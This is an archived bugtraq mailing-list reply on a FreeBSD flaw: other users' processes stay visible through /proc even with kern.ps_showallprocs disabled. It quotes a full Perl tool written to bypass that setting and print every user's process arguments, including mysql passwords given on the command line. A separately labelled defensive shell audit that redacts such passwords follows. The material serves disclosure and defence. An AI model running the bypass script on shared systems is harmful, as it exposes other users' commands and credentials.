[28497] in bugtraq


Re: ps information leak in FreeBSD

daemon@ATHENA.MIT.EDU (Jez Hancock)
Mon Jan 20 23:38:48 2003

Date: Tue, 7 Jan 2003 09:18:00 +0000
From: Jez Hancock <jez.hancock@munk.nu>
To: bugtraq@securityfocus.com
Message-ID: <20030107091800.GC56102@users.munk.nu>
Mail-Followup-To: bugtraq@securityfocus.com,
	Cache <cache@sowatech.com.pl>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20030105204650.M16523@sowatech.com.pl>

On Sun, Jan 05, 2003 at 08:46:50PM +0000, Cache wrote:
> This is a little information leak. This bug(?) is not dangerous, but
> a normal user can see all processes on the box using e.g. /bin/ps;
This topic was addressed on the freebsd-security list a while back, where
someone also noted that all user process information can be obtained
by regular users even with the sysctl flag 'kern.ps_showallprocs' set simply
by looking at the contents of /proc.  The following script was also
posted by someone to demonstrate this:

#!/usr/bin/perl
#
# hhp-sap_evade.pl ([s]how[a]ll[p]rocs) 02/03/2002
# author: JohnnyB
#
# a very basic tool that breaches the FreeBSD sysctl kern.ps_showallprocs=0
# option; an option that hides other users process information.
# (why would they implement such a broken and easily evaded option?)
# [and no this didnt take any skill.  its basically an output format]
#
# Tested on FreeBSD 4.5-RC.

print "[USER]      [GROUP]     [PID]   [FILE/ARGS]\n";
opendir(DIR,"/proc");
@procs=readdir(DIR);
closedir(DIR);
foreach ${proc} (@procs){
 if(${proc}=~/[0-9]/o){
  unshift(@pids, ${proc});
 }
}
foreach $pid (@pids){
 open(FD, "ls -al /proc/$pid/file|");
 while(<FD>){
  chomp;
  ${l}=$_;
  ${l}=~s/\s{1,}/ /g;
  if(${l}=~/.*? 1 (\S+) (\S+) .*?\/proc\/${pid}\/file -> (\S+)/){
   &ppid(${1},${2},${pid},${3});
  }
 }
 close(FD);
}
exit(0);

sub ppid(){
 (${a},${b},${c},${d})=@_;
 undef(${str});
 undef(${line});
 if(-e "/proc/$c/cmdline"){
  open(heh,"cat /proc/$c/cmdline|");
  @hah=<heh>;
  @chars=split(//,@hah[0]);
  foreach ${chr} (@chars){
   if(${chr}=~/[^a-zA-Z0-9\-_=\.\/\@\(\):\$#!&\*\+\|\"\'\;\[\]<>\?~`\^]/o){
    ${str}.=" ";
   }else{
    ${str}.=${chr};
   }
  }
  ${line}.=${a};
  while(length(${line})<11){${line}.=" ";} #alignment...
  ${line}.=" ".${b};
  while(length(${line})<23){${line}.=" ";}
  ${line}.=" ".${c};
  while(length(${line})<31){${line}.=" ";}
  chop(${str});
  if(${d}eq"unknown"){
   ${str}=~s/\s{1,}//g;
   ${line}.=" ("."${str}".")";
  }else{
   ${line}.=" "."${str}";
  }
  @line=split(//,${line});
  if(length(${line})>80){
   ${cntr}=0;
   foreach ${char} (@line){
    if((${cntr}==80)||(${cntr}==128)||(${cntr}==176)||(${cntr}==234)){
     print "\n"." "x32;          #^Anything >, deal with the rollover.
    }
    print "${char}";
    ${cntr}++;
   }
   print "\n";
  }
  else{
   print "${line}\n";
  }
  return(0);
 }
}

I believe someone (last poster in this thread?) also posted a patch on the same
list, freebsd-security.

It's annoying in that I see a lot of users running mysql with the -u and -p options:

mysql -u user -p mypassword

on the command line, thinking that this info will not show up in ps listings when ps
is run by other users.  Ho hum...

Regards,

Jez Hancock
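As an added example (not part of this thread and not code from any of its authors), the defender-side counterpart to the point above: an audit that reads `ps -axo user,pid,command` style output and reports processes whose argument list carries a password (mysql `-pSECRET`, `--password=SECRET`, `--password SECRET`), with the secret redacted so the report does not re-leak it. The function names `audit_cmdline_secrets` and `demo_sample`, the tool name `backup-tool` and all sample lines are constructed for the example.

```shell
#!/bin/sh
# Added example: audit process argument lists for passwords passed on the
# command line, which any local user can read via ps or /proc.
# Live use on FreeBSD:  ps -axo user,pid,command | audit_cmdline_secrets

audit_cmdline_secrets() {
    # Input: "USER PID COMMAND..." lines on stdin. Output: one redacted
    # EXPOSED line per process that hands a password over as an argument.
    awk '
    $1 == "USER" { next }                       # skip the ps header line
    {
        user = $1; pid = $2
        cmd = $0
        sub(/^[ \t]*[^ \t]+[ \t]+[^ \t]+[ \t]+/, "", cmd)   # strip user and pid
        split(cmd, argv, /[ \t]+/)
        prog = argv[1]; sub(/.*\//, "", prog)   # basename of the program
        cmd = " " cmd                           # pad so " -p" can be matched simply
        n = 0
        # mysql family short form: -p glued to the password (-p alone is a prompt, safe)
        if (prog ~ /^(mysql|mysqldump|mysqladmin)$/)
            n += gsub(/[ \t]-p[^ \t]+/, " -p********", cmd)
        # long forms used by many tools: --password=SECRET and --password SECRET
        n += gsub(/--password=[^ \t]+/, "--password=********", cmd)
        n += gsub(/--password[ \t]+[^ \t-][^ \t]*/, "--password ********", cmd)
        if (n == 0) next
        sub(/^ /, "", cmd)                      # drop the padding again
        printf "EXPOSED user=%s pid=%s cmd=%s\n", user, pid, cmd
    }'
}

# Constructed sample of ps output (not captured from a real system).
SAMPLE_PS='USER PID COMMAND
root 12 /usr/sbin/sshd
bob 4455 mysql -u bob -pS3cret dbname
alice 4456 /usr/local/bin/mysqldump --password=hunter2 -u alice shop
carol 4457 backup-tool --password topsecret /srv/data
dave 4458 ps -p 123
erin 4459 mysql -u erin -p'

demo_sample() {
    printf '%s\n' "$SAMPLE_PS" | audit_cmdline_secrets
}

demo_sample
```

Only the three processes carrying an inline password are reported; `mysql -u erin -p` (password prompted) and `ps -p 123` are correctly ignored.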
